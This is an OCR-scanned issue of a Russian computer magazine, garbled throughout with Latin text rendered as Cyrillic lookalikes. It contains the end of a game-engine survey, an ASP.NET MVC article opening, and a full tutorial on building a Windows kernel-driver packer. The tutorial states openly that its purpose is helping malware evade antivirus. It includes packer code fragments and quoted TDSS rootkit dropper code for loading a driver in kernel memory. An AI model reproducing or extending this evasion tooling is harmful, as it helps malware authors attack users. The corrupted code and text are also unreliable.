же году она начала продажу движка под двумя лицензиями. Первая лицензия 
предполагает покупку всего движка вместе с исходниками за баснословную 
(или все-таки охрененную) сумму денег. По второй лицензии за 99 долларов 
(в расчете на одного разработчика) на год приобретается доступ к облачно- 
му сервису, в котором с помощью специальной программы-клиента разра- 
ботчик может создавать игру. Если исходить из первого варианта, то юзеру 
придется организовывать всю аппаратную и программную инфраструктуру 
игры (на рис. 3 можно увидеть клиент-серверную архитектуру НегоЕпдіпе). 
Кроме серверного железа, сюда входит: серверная ОС (Сепі: 05), БД Огасіе, 
лицензия на которую стоит также немерено. Исходя из второго варианта, все 
лицензии на дополнительное ПО, обслуживание серверного ПО и железа 
берет на себя Ісіеа РаЬгіс — для инди-студий очень благоприятный вариант, 
поэтому далее мы приведем описание облачной технологии НЕ2. 
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Клиентское приложение (как и разработанные игры) предназначе- 
но только для ѴѴіпсІоѵѵз. В облаке над одной игрой могут работать сра- 
зу несколько человек: гейм-дизайнер пробует новую фичу, аниматор 
настраивает перса, левел-дизайнер строит уровень, кодер пишет ло- 
гику. НегоЕпдіпе предоставляет всем участникам группы разработки 
специальные инструменты. Это составляет одно из важнейших пре- 
имуществ — «живая» совместная разработка. Второе, что ты получаешь 
вместе с НегоСІоисІ, — это доступ к примерам реальных ММО-игр: от со- 
циальных до онлайн-шутера, среди сэмплов имеется «недоделанная» 
ММОВРО Него’з боигпеу, она представляет собой охватывающий все 
аспекты глобальных игр пример. 

С технической стороны НегоЕпдіпе предлагает визуализацию 
на ЭігесІХ 9.0с и другие интегрированные программные системы, среди 
которых: РРузХ — для обработки физики, РасеОеп — тіббіеѵѵаге для ге- 
нерации трехмерных лиц, ЕМоб — для воспроизведения звуков и музыки, 
видеоконверторы от ВАЭ Сате Тооіз, высококачественная визуализация 
растений ЗреесІТгее и другое. 

Особого внимания заслуживают инструменты, предоставляемые 
НегоСІоисІ. Итак, НегоВІасІе — клиентское приложение включает: ѴѴогІсІ 
Виіісіег — конструктор мира дает интуитивные инструменты для изме- 
нения ландшафта, построения зданий, размещения объектов, настрой- 
ки динамического освещения; с помощью системы персонажей можно 
создавать легко настраиваемые, динамические существа, технология 
морфинга позволяет тонко настраивать лица и синхронизировать губы 
с речью; гибкая система слежения за костями позволяет создавать спец- 
эффекты, происходящие, например, при ударе мечом; система эффек- 
тов включает параметризированную подсистему частиц: частицы могут 
быть источниками частиц, РХ-система позволяет связать вместе части- 
цы и аудиоэффекты; игровая система служит для возможности непре- 
рывной работы, после внесения изменений тебе никогда не придется 
перезапускать игровой сервер или перезагружать БД, все изменения 
подхватываются на лету, кроме того, она предоставляет общие для всех 
ММО-игр компоненты, к примеру, во всех подобных играх, чтобы полу- 
чить доступ к аккаунту, надо ввести логин и пароль, и такая система уже 
реализована; чтобы менеджер твоей команды мог самостоятельно сле- 
дить за процессом разработки, в НВ встроен ОгеатМападег, который по- 
зволяет создавать и назначать таски для разработчиков, а также следить 
за их выполнением. 

Для написания скриптов в движке есть объектно-ориентированный 
типобезопасный скриптовый язык НегоЗсгірІ:, написанные и скомпили- 
рованные скрипты сохраняются непосредственно на сервере. Скрипты 
на языке НегоЗсгірІ выполняются даже быстрее Руійоп-программ. Таким 
образом, все игровые действия, реакция на события, игровые механиз- 
мы и прочее реализуются на этом языке. Интегрированный скриптовый 
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Рис. 3. Клиент-сер- 
верная архитектура 
НегоЕпдіпе 

Рис. 4. НегоВІасіе 
в действии 



редактор не только подсвечивает код, но и позволяет провести отладку. 
Кроме того, в нем ведется история версий, он позволяет проводить срав- 
нения, мержить изменения, то есть получать в свое распоряжение функ- 
ции полноценной ЮЕ. Вдобавок в НЕ есть удобный редактор ОІЛ. 



Предел на размер статьи неумолимо приближается с каждым символом, но в разгар мобильных технологий я не могу не рассказать о движках данной категории. 




Сосо5 20-Х 



Цена: Тгее 

Порог вхождения: средний 
Исходный код: открытый 



Оригинальный Сосоз 20 был разработан на РуШоп в 200В году, затем в том 
же году он был портирован на языке ОЬіесІіѵе С под іРйопе (версия Сосоз 
20-іРЬопе); два года спустя была выпущена кросс-глатформенная версия 
Сосоз 20-Х на С++. 

Если коротко проследить дальнейшую историю, то видно, что потом по- 
явились версии с поддержкой АпбгоісІ (Оаѵа), ХЫА (С#) и НТМІ_5 {ОаѵаЗсгірІ:). 
Также имеется расширение для визуализации трехмерной графики Сосоз 
ЗР, но оно не получило особого развития и распространения просто потому, 
что юзерам не хочется 30 на мобильном девайсе. 

Самая востребованная версия именно Сосоз 20-Х, благодаря С++ 
и кросс-платформенности. Текущей стабильной версией движка является 
2.1.5, которая вышла 23 августа сего года. Заявлена поддержка: І05, Апбгоіб, 
ѴѴіпсІоѵѵз РМопе 7 (ХІЧА), ВІаскВеггу, Тігеп, Ваба, Магтаіабе, ѴѴіпсІоѵѵз, Ыпих. 
Используя Сосоз 20-Х, можно кодить на С++, І_иа и баѵаЗсгірТ Движком 
пользуются как программисты-исследователи, небольшие инди-команды, 
так и монстры игровой индустрии: 2упда, Копаті, Оізпеу МоЬіІе. Благодаря 



бешеной популярности движка — полтора миллиарда закачек основанных 
на нем игр — в его развитии принимают участие разработчики из Соодіе, 
МісгозоК, Іпіеі. 

Поддержка движком акселерометра позволяет создавать динамичные 
игры с перемещением в пространстве. Безусловно, для обработки физики 
используется Вох 20 , плюс, на выбор, движок СЫртипк. Имеется несколь- 
ко специальных отдельных редакторов (как платных, так и бесплатных), 
служащих для создания определенного контента: атласы, шрифты, части- 
цы, спрайтовые таблицы и так далее. Набор СІЛ -элементов довольно мал, 
но можно создать недостающие компоненты самостоятельно. 



ИТОГИ 

Мы вкратце рассмотрели современные игровые движки для всех по- 
пулярных на сегодняшний день платформ: универсальные, специально 
предназначенные для ММО и мобильные. Выбор навязывать не буду: 
все зависит от конкретного случая и предполагаемого проекта. На ос- 
нове приведенных данных можно также сделать выбор, исходя из сво- 
его бюджета. 

Однако, к сожалению, реальность такова, что в настоящее вре- 
мя имеет смысл разрабатывать игры только для двух платформ: ЮЗ 
и Апбгоіб. Будем считать, что я этого не говорил, так как я сам верю 
в светлое будущее и большие хардкорные игры. До встречи! ЗЕ 
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Упаковщики исполняемых файлов в ѴѴіпсіоѵѵз — явление весьма и весьма рас- 
пространенное. Нет, я не про экономию канала в интернет или сохранение 
дискового пространства. Дело в спросе на упаковщики в рядах темной сторо- 
ны силы. 




Александр Эккерт 

5Іаппіс.тап@дтаіІ.со 



а, упаковка малвари сегодня, наверное, один 
из немногих способов обуть аверы с их проактив- 
ной защитой. Среди умельцев большим спросом 
пользуются кодеры, способные написать соб- 
ственный неповторимый упаковщик и обеспечить 
его своевременной техподдержкой. Заинтересованные люди 
платят за такой «непалящийся» упаковщик весьма неплохое 
вознаграждение, в чем можно убедиться, почитав тематиче- 
ские форумы. 

Еще больший интерес представляют упаковщики драй- 
веров; при этом цена, к примеру, за один упак драйвера 
не сравнится с аналогичной за упак простого экзешника. 
Для непосвященной публики такую разницу можно объяснить 
«значительными сложностями при создании упаковщика, ведь 
это типа драйвер же...», многозначительно и презрительно 
фыркнув в ответ. 

Действительно, сложности есть. Главная загвоздка заклю- 
чается в понимании того, как именно система запускает сам 
драйвер, — программисту нужно суметь разобраться, как стар- 
товать драйвер в ядре. И если для обычного упаковщика нужно 
исхитриться запустить новый процесс для запуска упакованно- 
го экзешника, то с драйвером будет немного сложнее. 

Но обо всем по порядку. 



Естественно, данное логическое деление весьма и весьма условно и предназначе- 
но для того, чтобы облегчить тебе понимание. Другие кодеры, сведущие в теме статьи, 
вполне могут поспорить со мной, предложив другое логическое описание. 

Итак, определившись с направлением, рассмотрим все по порядку. 

отелов кделу 

Упаковщик, конечно, будет юзермодный, то есть упаковка/распаковка будет проис- 
ходить в пользовательском режиме. Нет, разумеется, можно написать и гО-ЬазесІ па- 
кер, однако это лишний гемор. Поэтапно рассмотрим последовательность действий 
при создании упаковщика. 

Первый этап будет состоять из проецирования драйвера в память, сохранения нуж- 
ных нам полей и упаковки проекции при помощи какой-нибудь либы для сжатия. 

С частью кода, которая будет паковать целевой драйвер, ничего сложного нет. Там 
обычно используются сторонние библиотеки, специально для этого заточенные, такие 
как аРІ_іЬ — библиотека для сжатия исполняемых файлов для МісгозоП ѴѴіпсіоѵѵз с ча- 
стично открытым исходным кодом. В работе с ней нет ничего мудреного, все элемен- 
тарно (да просто пасьянс «Свободная ячейка», елы-палы! — Прим. ред.). 

При использовании аРІ_іЬ в своем проекте нужно будет добавить соответствую- 
щие арІіЬ.ІіЬ, а также файлы либы арІіЬ.б, бераскз.И и сіераскз.с. 

Для удобства все необходимые нам сведения о запакованном драйвере будем 
хранить в отдельной структуре, они нам в дальнейшем понадобятся. Делается это 
довольно легко и в сильно сокращенном виде, без проверок на вшивость, может 
выглядеть так: 



РЕ-ФАЙЛ II НЕТОЛЬКО 

Несмотря на то что сорцов упаковщика драйверов в интернете 
не так много, мне кажется, кодеру, более-менее разбирающе- 
муся в системном кодинге, осилить тему не составит труда. 

По моему скромному мнению, для того чтобы понять тему 
упаковщиков/крипторов/пермутаторов, нужно только одно — 
хорошо разбираться в специфике РЕ-формата, ибо и ЕХЕ- 
(01_І_-), и 5У5-файлы суть одно и то же. Проблема лишь в том, 
чтобы разобраться в той самой «специфике РЕ-формата», — 
для этого нужно съесть не один пуд соли и выпить не одну боч- 
ку пива. Особенно в части работы с импортом. Искать логику 
в действиях разработчиков РЕ-формата я бы не стал, не знаю, 
что такое забористое они там курили, но я давно смирился 
с этим извратом, действуя по логике «понимать не обязатель- 
но, нужно просто запомнить». 

Прошу прощения за это лирическое отступление, едем 
дальше. 

Информации о работе с РЕ-файлами в Сети вагон и ма- 
ленькая тележка. Могу только порекомендовать покопаться 
на ехеІаЬ.ги, тамошние ребята именно на этом специализиру- 
ются. Не один миллион раз писалось о РЕ-формате и на хакер, 
ги , и на других популярных сетевых ресурсах, посему повто- 
ряться не будем, смысла нет никакого. Тем же читателям, ко- 
торые слышат о РЕ в первый раз, рекомендую отложить статью 
в сторону и вернуться только после изучения и твердого усво- 
ения данной темы. 

Ну и естественно, крайне важное замечание: при раз- 
работке не забывать про разницу в структурах исполняемых 
файлов в ѴѴіп32 и \АЛп64. 

СТРУКТУРА УПАКОВЩИ КА 

Итак, упаковщик драйвера состоит из нескольких логических 
частей: 

1. Сервиса, который спрессует и, если надо, зашифрует це- 
левой драйвер. 

2. Сервисной части, которая будет грузить драйвер в режиме 
ядра. Назовем это ядерным загрузчиком, который займет- 
ся всем хозяйством по приведению распакованного драй- 
вера в православный вид (с подправленным импортом, 
релоками и прочими филейными частями тела). 

3. Распаковщика, ну и... 

4. Из сервисной части, которая соединит все это воедино. 



В00І.ЕАІМ РгерагееіоЬаЮа*а( _іпои1: РКІѴЕК_ІО_ВЕ_ВАСКЕР * Я1е ) 

I 

/ / . , . з кі рресі 

ЕІеНапбІе = Сгеа-ЬеРі1е(^1е->Гі1епате. 6ЕІЧЕКІС КЕДР. РНЕ 5НАКЕ КЕАР - 

| РНЕ ЗНАКЕ ЫКІТЕ. 0. 0РЕN АШАУ5. 0. 0) ; 

і-Р ( Ь 1 еНа псііе 1= I (ЧУД НО НАІЧ РІ-Е ѴАШЕ && 6е^Рі1е5І2е(^1еНапсІ1е. Ѳ )) 

і 

■(і1е->Рі1е5І2е = Се1:Рі1е5І2е(Я1еНапсІ1е > 0); 

■р1еМарріп§ = Сгеа1:еРі1еМарріп§( ІпІеНапсІІе, Ѳ, РАС Е_КЕ АРОМ 

0, 0, 0); 

І-Р( ЯІеМарріпе ! = ІМѴАІ_Ю_НАІ\ЮІ_Е_ѴАІ_иЕ ) 

і 

тарР'Ьг = МарѴіемО-РРі1е(Рі1еМарріп^ РI^Е_МАР_КЕА^^ 0, 0, 0); 

і-р ( тарРДг ) 

{ 

Рі1е г >МарРі:г = ( Ш.0ІЧСРТК ) тарРІх; 

51е->с1о5Нс1г = ( ІМА6Е 005 НЕАРЕК * ШарР1:г: 

Іііе- >пі=НсІГ = ( ІМА6ЕМТНЕАРЕК5 *)(( ВУТЕ * )Е1е->+- 

бозНсІг + Рі1е->сІ05НсІг->е_И : апеілі) ; 

Ц_ . . . 5 кір р еб - > пр о верка с е кци й и т. д . 

й1е->ВѵаО-Рітрог1:ТаЬ1е = ^1е->пфНбг->0р1іопа1Неабег .4-> 
РаТаРігес1:огу[ ІМА6Е Р ІКЕСТО КУ_Е М ТКУ _ІМРОКТ ] . Ѵіг 1:иа 1Аббгѳ55 ; 
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Кстати, отладчик 
Віппаѵі очень даже 
ничего... 



ѴѴАІШІЫС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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( бІе-ЖѵаОТітрогіТаЬІе != 0 ) 

{ 

ІЛОІМС к = 0; 

// Тут можно использовать ІлТШАРІ 

// ІтаёекѵаІо5ес1:іоп ( ) 

к - КѴАіо 5 есТіопОТТ5еі:({ие->КѵаО-РітроігЕТаЬ1е') ; 

І-р ( к == -1 ^ 

-I- 

геіигп РАІ.5Е; 

} 

біе- >Ітрог'Р0ігес1:ог , у5І2е = 1е - ■ 

піНсІг- >Ор±іопаІНеасІег . ОаіаОігесѣогу*-' 

[ 1МАСЕ_01ГСЕСТ0КУ_Е1УТГСУ_1МРСЖТ] .5іге; 
біе- >ІтрогіОе5сгірі:ог = 

( ІМА 6 Е ІМРОКТ РЕ 5 СКІРТОК *)( (ВУТЕ * 7 — 

тарРіг + к); 

} 



{іІе-ЖѵаО-РКеІосзТаЫе = Ітіе - >п1:НсІг- 

ОрііопаІНеасіег . ОаіаОігесіогу»-' 

[ІМАСЕ РІКЕСТОГСУ^ЕМТКУ ВА5ЕКЕЮС] . ѴігіиаІАсісІгезз ; 

// . .. зкірресі 

ІіІе-ЖѵаО-РКБГсТаЬІе = й1е->п1:Нсіп->0р1;іопа1НеасІег.^ 
Ра1: а Ріг ес1:о гу[ІМА6Е_РІК ЕСТ0КУ ЕІЧТЕУ К Е 5 011 КС Е] 

Ѵіг1:иа1АсІс!ге5 5і 

// . .. зкір р е сі 



} 

} 

} 

геТигп ТКІІЕ; 

> 

Первое, что нужно сделать, — это 
предусмотреть выделение нужного 
куска памяти в лоадере, куда будет 
распаковано тело нашего драйвера 



Как-то так. Это самое начало — в коде, еще раз повторюсь, очень 
много убрано; самое главное — продемонстрировать ход мысли и ее ре- 
ализацию. 

УПАКОВКА ДАННЫХ 

Сама по себе упаковка данных ничем интересным не отличается. Так 
как используется аРУЬ, то сложностей там быть не должно. Смотрим: 

ІІМТ Сотрге550а1:а ( іп сопзі: ВУТЕ * зоигсе, 

іп Ш_0М6_РТК 1епе*Ь, 

іпоиѣ ВУТЕ ** Резііпаііоп ) 

I 

ІЯІМТ ілюгктет_5І2е = 0; 

І.РѴОІО ілюгктет - 0 ; 

могктет_$І 2 е = аР_ілюгктет_5І2е( 1еп §і:Ь ) : 

. могктет _=_та Нос ( ілюгктет_зі 2 е ); 



ІТ( ыогктет != 0 ) 

і 

ІЛМТ раскес1_5І2е = аР_тах_раскес1_5І2е( 1еп§1:И ); 
І_РѴ0Ю р = та!1ос( раскесІ_5І2е )_; 

Щр != 0 ) 

{ 

раскесі _5І2е = аР_раск(зоигсе, р. Іеп^ТИ. <-■ 

морктет., 0, 0); 

і-р ( раскесІ_5І2е != АРІІ В ЕК КОК ) 

і 

*Ре5*іпаТіоп = ( ВУТЕ *) р; 

■Ргее(ыогктет) ; 

геііигп раскесі зіге; 

} 



-Ргее(р); 




} 

геіигп АРІ_ІВ_ЕККСЖ; 

} 



Уверен, что до этого момента каких-либо видимых сложностей у чи- 
тателя возникнуть не должно. Сложности начинаются сейчас — нужно 
придумать и реализовать самостийный ядерный загрузчик, ну и доба- 
вить его в тело кодеса. Ибо, напомню, эта часть будет единственной, 
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. . . и на вид, и на ощупь 



которая будет отличать упаковщик драйвера от упаковщика стандартного 
экзешника. 

Первое, что нужно сделать, — это предусмотреть выделение нужного ку- 
ска памяти в лоадере, куда будет распаковано тело нашего многострадально- 
го драйвера. Делается это посредством вызова соответствующей кегпеІ-АРІ 
ЕхАІІосаІеРооК). Для интереса посмотри — примерно похожим образом про- 
исходит заражение тела драйвера со стороны дроппера знаменитого руткита 
Ю85 (честно стырено вот отсюда: Ііпѵ игІ.со т/ахаиІ^ : я думаю, глубоко ува- 
жаемый мной сг4зб в обиде не будет): 

ЕхАІІоса^еРооІ = _§еѣарі(кегпе1_Ьа5е, 0хРЕ45Е9бСи); 

// Выделяем память под структуру, в которой будут храниться 
// зн ачения различных ключевых переменных, а также 

// прочитанное с диск а тело рут кита 

соігЕехІ : - ЕхАІ1оса~ЕеРоо1(Ѳ. 0хб9А60и Х і 

теш5е1:(соп1:ех1:, 0, 0хб9АбѲи); 

*(Ш.СЖ6 РТК * ^ ( согтЕехІ: + 1968) = кегпеІ Ьаге: 

*(ЦІ.0М(з_РТК *){согтЕех1: + 352) - РгіѵегОв^есІ:: 

тетсру((ѴОІР *)(сопіех1: + 1972) , гаге. 0х395и): 

Более подробно смотри в блоге сгАзІп’а. 

После того как мы сохранили все необходимые поля, упаковали целевой 
драйвер, необходимо будет временно сохранить драйвер на диск, добавив 
ко всей этой каше кегпеі-іоасіег. 

Для загрузки нам обязательно понадобятся основные РЕ-поля драй- 
вера-дроппера: 

РІ.РК РАТА ТАВІЕ ЕЫТК У ІбгОХе = (РЮК_РАТА_ТАВ1Е_ЕМТКУ)^ 

ОгіѵегОЬіес1:->Ргіѵег5ес1:іоп; 

сіозНсіг = (РІМАСЕ_Р 05_НЕАРЕК)1бгР1:е->Р11Ва5еі 

піНсіг = (РІМА6Е N1 НЕАРЕК5Н(Ш0М6 РТКШгр-Ее->РІІВа5е + ^ 

бозНсІг- >е_1-Еапеы) ; 

5ѲСІНСІГ = ІМА6Е ГІК5Т 5ЕСТЮЫ(п1Наг) : 

ПОПРОБУЕМ СОБРАТЬ ВСЕ ВМЕСТЕ 

Для старта нашего драйвера после его распаковки (код чуть ниже) необходи- 
мо будет пересчитать релоки и импорты родившегося на свет драйвера (как 
это сделать — тема достаточно избитая). 



ІЛ-ОІ\ІСі_РТК Ресошрге55( ВУТЕ 

вуте * азѣ, ш_омб_ртк а$иеп) 

і 



* 5ГС, Ш_0МС_РТК 5ГСІѲП, 



ге^игп аРсІераскза-Гѳ^згс . згсіеп, сізі:, сізіііеп); 

} I 

// . .. и где-то в ко де . . . 

ВУТЕ * зге = ( ВУТЕ *)( іша§еВа5е + зес1:НсІг[1] ._е 
ѴігІиаІАсІсІгезз ) ; 

іТ ( Іо асіе г В 1оск->ипрас ке сІ 5іге == Рееотрг е55<-» 

(зге, зесШсІгІ ( .5І2еОТКамРа1:а, ипраскесІРа іа. <-■ 

1оасІепВ1оск->ипраскесІ_5І2е) ) 

{ 

* * * 

1 

// или что-то типа того... 

Ну и наконец-то вызвать ЕпІгуРоіпТ 

Например, в упомянутом дроппере ТБ53 это делается так: 

5І:а1:и 5 - ((сИаг *)Ргі ѵегОЬзес1:->Ргіѵег51:аг 1: + «-■ 

*( Ц1_0М(з_РТК * ) ( Г5гс + 8 ) ) ) ( РгіѵегОЬзесЕ, Ке§і5І:гуРа1:И ): 

Код уже должен быть понятен без пояснений, потому что в нашем случае 
это будет происходить похожим образом. 

Осталась самая малость: найти этот самый ЕпігуРоіпІ: в нашем толь- 
ко что распакованном драйвере. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

За рамками статьи остались такие моменты, как сохранение драйве- 
ра-дроппера после добавления новой секции, упорядочивание ре- 
локов, импорта, экспорта, копирование ресурсов, получение базы 
ядра и адресов, необходимых для старта функций (той же самой 
ЕхАІІосаІеРооІО), и ряд некоторых мелких моментов. 

Честно говоря, уместить такую интересную тему, как создание упа- 
ковщика драйвера, в рамках одной статьи — задача малореальная. 
В ней много тонкостей и подводных камней, ухватить которые без опы- 
та написания похожих проектов не слишком вероятно. Хотя, честно го- 
воря, я и не преследовал такой цели — давать в руки готовый продукт 
означает отключить твои же мозги и не давать им работать. А иначе 
как ты будешь развиваться и расти как программист? :) Но если ты по- 
лон решимости освоить тему — пиши на мыло, будем разбираться 
вместе. 

В файлах к статье ты сможешь найти некоторые функции (не все) 
и структуры, описанные в статье. 

Удачного компилирования и да пребудет с тобой Сила! СС 
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И ЕГО ПЛЮШЕЧКИ 



Вообще-то перед тобой продолжение статьи из про- 
шлого номера под названием «Багтрекер на АЗР. 

ЫЕТ МѴС». Я хотел было написать введение покруче, 
но оказалось, что оно у меня получилось очень по- 
хожим на рекламные проспекты Майкрософта, и ре- 
дактор его стер. И написал все это вместо меня. Все, 
читай давай! 

БЕЗ ПЛЮШЕК НИКУДА 

Готовых расширений для МѴС-фреймворка создано уже порядочно. К услугам искушенных 
разработчиков шаблонизаторы, библиотеки для взаимодействия с сетью и куча всякой 
всячины на все случаи жизни. Подключить подобный пакет — дело одной команды в ЫиОеі 
Сопзоіе. О наиболее полезных примочках и техниках взаимодействия с ними я расскажу 
в этой статье. 

ВСТИЛЕНИНДЗЯ 

Мы знаем, что идеальных технических заданий не бывает. Заказчики постоянно меняют 
условия, и цель матерого разработчика — писать легко масштабируемый код. Пусть даже 
приложение будет трижды крутым, но если каждый допил будет сопровождаться головной 
болью, то рано или поздно от поддержки неуклюжей поделки придется отказаться. 

Сразу вспоминаю пример из своей практики. Однажды мне пришлось участвовать 
в доработке функционала самописной ЕЯР. Вроде бы и код был написан неплохо, но от- 
сутствие четкой архитектуры и сильная связанность всех компонентов быстро разбили мои 
юношеские грезы. В итоге уверенность в быстром написании {и быстром получении бабла) 
конвертнулась в несколько недель интимных отношений с дебаггером. Новый функционал 
предательски конфликтовал со старым кодом и порождал настоящий хаос. Баги размножа- 
лись как кролики, мой бодрый настрой угасал с каждой минутой. Жаль, что тогда я не знал 
о методике под странным названием «внедрение зависимостей». А ведь она могла сохра- 
нить мою голову от многих шишек, набитых по неопытности. Хорошая архитектура прило- 
жения подразумевает отсутствие сильной связи между составляющими ее компонентами. 
Чем меньше связь, тем ниже вероятность сломать работающий код при добавлении нового. 

Как я уже сказал, один из способов ослабить связь компонентов приложения — вос- 
пользоваться методикой под названием «внедрение зависимостей» (йерепсіепсу І^есііоп, 
РІ). Применяя 01, разработчик не указывает конкретные зависимости, а работает сугубо 
с интерфейсами. Необходимая реализация объектов будет внедрена в приложение уже во 
время его работы, исходя из заданных настроек конфигурации. Не переживай, если до это- 
го ты ни разу не применял технику внедрения зависимостей. Скупой текст определения 
может загнать в ступор, но на практике все обязательно встанет на свои места. 

Перед тем как приступать к рассмотрению практических примеров, нам необходимо 
определиться с фреймворком, посредством которого будем реализовать внедрение зави- 
симостей. Для .ЫЕТ их написано достаточно много. Даже МісгозоТС успела зарелизить свой 





